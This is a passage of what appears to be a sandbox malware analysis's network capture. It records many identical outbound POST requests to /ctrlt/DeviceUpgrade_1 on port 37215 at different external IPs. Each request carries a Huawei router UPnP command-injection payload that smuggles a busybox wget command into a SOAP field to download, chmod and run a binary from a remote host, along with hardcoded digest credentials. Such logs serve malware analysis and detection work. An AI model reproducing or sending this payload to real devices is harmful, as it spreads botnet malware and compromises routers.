2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1224192.168.2.154096641.254.141.24037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178565979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1225192.168.2.153513641.4.10.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178590059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1226192.168.2.155678441.102.227.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178623915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1227192.168.2.156008241.248.55.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178646088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1228192.168.2.156045441.229.124.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178662062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1229192.168.2.155819241.8.208.5237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178687096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1230192.168.2.1548718197.48.153.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729119062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1231192.168.2.1539062197.112.148.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729144096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1232192.168.2.1535668197.115.140.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729183912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1233192.168.2.1546244197.217.213.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729187012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1234192.168.2.1546346197.121.160.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729190111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
